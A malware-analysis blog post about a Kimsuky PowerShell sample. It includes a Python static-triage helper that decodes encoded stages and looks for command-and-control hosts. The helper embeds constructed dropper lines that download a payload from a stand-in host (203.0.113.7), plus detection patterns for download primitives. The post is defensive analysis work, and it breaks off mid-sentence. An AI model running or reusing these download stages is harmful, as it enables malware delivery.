Everyday is lazarus.dayβ

Kimsucky 2

2024-03-09, somedieyoungZZ


In my previous blog post, I covered the analysis of a North Korea-based APT group called Kimsucky. We examined a malicious document that used a PowerShell script for the adversary's purposes. Let's review some key points about Kimsucky:
- Targets: primarily organizations in South Korea, Japan, and the United States.
- Techniques: often uses malicious documents containing exploits or links that download malware capable of stealing data or providing remote access.
- Tactics: employs social engineering (such as spear phishing) and watering-hole attacks to gain initial access to victim systems.
I found this particular Kimsucky sample in the wild while doing my daily after-wake-up bazaar browsing. Interestingly, the sample is very simple and will help people understand how PowerShell works. Unfortunately, the sample I found didn't have any connections, or the C2's IP was missing from the script.
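Before writing off a dropper as "no C2 in the script", it is worth checking that the host is not simply hidden one layer down. The helper below is an added example written for this post (it is not the sample discussed here, nor the author's code): it scans a PowerShell script for IPv4 literals, URLs and the usual download primitives, decodes any `-EncodedCommand` / `FromBase64String` stage it finds and scans those too, and flags the common Kimsuky-style shape where a literal scheme is concatenated to a variable so the server is only decided at runtime. The two scripts inside the block are constructed stand-ins, and `203.0.113.7` is a documentation address, not a real indicator.

```python
"""Static triage helper: does a PowerShell dropper actually name its server?

Added example, not the page's sample. The two scripts below are constructed
stand-ins; the IP 203.0.113.7 is a documentation address, not a real C2.
"""
import base64
import re

# Download / beacon primitives worth flagging even when no host is present.
DOWNLOAD_PRIMITIVES = (
    "Net.WebClient", "DownloadString", "DownloadFile", "Invoke-WebRequest",
    "iwr", "Invoke-RestMethod", "irm", "Start-BitsTransfer",
    "HttpWebRequest", "Sockets.TcpClient",
)
IPV4_RE = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
)
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s'\"()<>]+", re.IGNORECASE)
# -EncodedCommand / -enc / -e <b64>   and   FromBase64String("<b64>")
B64_RE = re.compile(
    r"(?:-e(?:ncodedcommand|nc|c)?\s+|FromBase64String\(\s*['\"])"
    r"([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)
# A literal scheme glued to a variable: the host is chosen at runtime.
RUNTIME_HOST_RE = re.compile(r"['\"](?:https?|ftp)://['\"]\s*\+", re.IGNORECASE)

# Constructed sample 1: download primitive present, but the host comes from
# $srv, which is never assigned in the file. This is the "C2 IP missing" shape.
SAMPLE_NO_C2 = (
    "$ErrorActionPreference = 'SilentlyContinue'\n"
    "$u = 'http://' + $srv + '/in.php'   # host supplied at runtime\n"
    "Invoke-WebRequest -Uri $u -OutFile $env:TEMP\\r.dat\n"
)
# Constructed sample 2: same outer script plus a base64(UTF-16LE)
# -EncodedCommand stage that does carry a literal URL. A plain grep of the
# file sees no IP at all; only the decoded layer shows it.
INNER_STAGE = (
    "$w = New-Object Net.WebClient; "
    "$w.DownloadString('http://203.0.113.7/p.txt')"
)
SAMPLE_ENCODED = (
    SAMPLE_NO_C2
    + "powershell -EncodedCommand "
    + base64.b64encode(INNER_STAGE.encode("utf-16-le")).decode("ascii")
    + "\n"
)


def decode_encoded_blocks(text: str) -> list[str]:
    """Decode every base64 blob B64_RE finds in `text`.

    -EncodedCommand is base64 over UTF-16LE; FromBase64String payloads are
    usually UTF-8. A NUL in the second byte is a cheap UTF-16LE tell.
    """
    decoded = []
    for match in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if len(raw) >= 2 and raw[1] == 0:
            decoded.append(raw.decode("utf-16-le", errors="replace"))
        else:
            decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def expand_layers(script: str, max_depth: int = 3) -> list[str]:
    """The script plus every decoded stage nested inside it, depth-limited."""
    layers, frontier = [script], [script]
    for _ in range(max_depth):
        nxt = [d for text in frontier for d in decode_encoded_blocks(text)]
        if not nxt:
            break
        layers.extend(nxt)
        frontier = nxt
    return layers


def extract_network_indicators(script: str) -> dict:
    """Scan the script and every decoded layer for hosts and download primitives."""
    layers = expand_layers(script)
    joined = "\n".join(layers)
    primitives = sorted(
        p for p in DOWNLOAD_PRIMITIVES
        if re.search(r"(?<![\w-])" + re.escape(p) + r"(?![\w-])", joined, re.IGNORECASE)
    )
    return {
        "ips": sorted(set(IPV4_RE.findall(joined))),
        "urls": sorted(set(URL_RE.findall(joined))),
        "download_primitives": primitives,
        "layers": len(layers),
        "host_built_at_runtime": bool(RUNTIME_HOST_RE.search(joined)),
    }


def is_c2_missing(report: dict) -> bool:
    """True when the script wants to talk out but names no host anywhere."""
    return bool(report["download_primitives"]) and not report["ips"] and not report["urls"]


if __name__ == "__main__":
    for name, script in (("no-c2", SAMPLE_NO_C2), ("encoded", SAMPLE_ENCODED)):
        report = extract_network_indicators(script)
        print(name, "c2_missing=%s" % is_c2_missing(report), report)
```

Run against the first sample the report lists `Invoke-WebRequest` and `host_built_at_runtime` but no IP or URL, which is exactly the situation described above: the script knows how to fetch, but the server is fed in from somewhere else. The second sample shows the caveat: grepping the file for an IP returns nothing, yet the decoded `-EncodedCommand` stage carries `http://203.0.113.7/p.txt`. When a sample "has no C2", it is worth confirming which of these two cases you are looking at before concluding the infrastructure is absent.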
PowerShell Analysis
Server Connection
Even though the script itself is not at …